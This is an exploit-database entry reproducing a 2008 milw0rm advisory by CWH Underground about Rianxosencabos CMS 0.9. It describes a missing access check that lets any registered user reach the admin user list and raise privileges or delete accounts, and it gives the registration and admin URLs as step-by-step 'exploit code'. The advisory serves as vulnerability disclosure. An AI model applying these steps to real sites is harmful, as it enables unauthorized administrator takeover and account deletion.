header-logo
Suggest Exploit
vendor:
Rianxosencabos CMS
by:
CWH Underground
N/A
CVSS
N/A
Arbitrary Add-Admin Vulnerability
N/A
CWE
Product Name: Rianxosencabos CMS
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability

Rianxosencabos CMS 0.9 has Vulnerability to escalate user to administartor's privilege. That Vulnerable in 'http://[Target]/[rsccms_path]/?s=admin&accion=lista' and You can Arbitrary change user's permission or delete user. This action will give your account can use All Admin Control Panel with Administrative's Privilege or Arbitrary Delete account in website.

Mitigation:

N/A
Source

Exploit-DB raw data:

============================================================
  Rianxosencabos CMS 0.9 Arbitrary Add-Admin Vulnerability
============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 21 September 2008
SITE   : cwh.citec.us


###################################################################################
APPLICATION : Rianxosencabos CMS
VERSION     : 0.9
DOWNLOAD    : http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
###################################################################################


--- Add-Admin / Delete-Account Vulnerability ---


-------------
 Description
-------------

    Rianxosencabos CMS 0.9 has Vulnerability to escalate user to administartor's privilege.
That Vulnerable in "http://[Target]/[rsccms_path]/?s=admin&accion=lista" and You can Arbitrary change user's permission or delete user

    This action will give your account can use All Admin Control Panel with Administrative's Privilege or Arbitrary Delete account in website.


--------------
 Exploit code
--------------
[+] Log in with your account, You can register with this URL "http://[Target]/[rsccms_path]/?s=usuarios&accion=registrar"
[+] Go to "http://[Target]/[rsccms_path]/?s=admin&accion=lista"
[+] Now you can Change user permission or delete user account


#####################################################################
 Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
 Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-09-21]